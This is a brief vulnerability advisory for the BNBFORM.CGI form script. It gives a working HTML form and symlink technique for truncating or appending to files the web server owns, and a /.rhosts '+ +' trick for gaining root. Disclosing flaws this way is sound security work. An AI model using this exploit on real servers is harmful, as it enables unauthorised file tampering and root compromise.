suid@suid.kg - mini advisory - BNBFORM.CGI

Software:   BNBFORM.CGI 
Vendor:    BigNoseBird.com
URL:    http://bignosebird.com/carchive/bnbform.shtml
Version:  Version 4.0
Platforms:  Unix, Windows NT
Type:    Input validation problem

Summary:

  Any local user can create / append to / truncate any file owned
  by the web server user (nobody/apache/whatever).

Vulnerability:

  Building a HTML form resembling:

    <form method=post action=/cgi-bin/bnbform.cgi>

    <input type=hidden name=blah value=blah>
    <input type=hidden name=required value=blah>
    <input type=hidden name=data_order value=blah>

    <!-- To truncate a file -->
    <input type=hidden name=countfile value="/tmp/whatever">
  
    <!-- To append to a file  -->
    <input type=hidden name=outputfile value="/tmp/whatever">

    <input type=submit>
    </form>

  In the /tmp directory as a local user, create a symbolic link to
  either /tmp/whatever.bcnt for the countfile/truncate version, or
  /tmp/whatever.bout for the outputfile/append version.

  If httpd is running with UID == 0, you could potentially get root
  if the system honours /.rhosts by setting the value of blah to
  "+ +\n". Then symlink'ing /tmp/whatever.bout -> /.rhosts Example:

    <input type=hidden name=blah value="+ +
">

  Of course you could simply send this in a POST request directly
  to the web server. Whatever.

  Ok. Have a good one.  

http://www.suid.edu/advisories/004.txt

EOF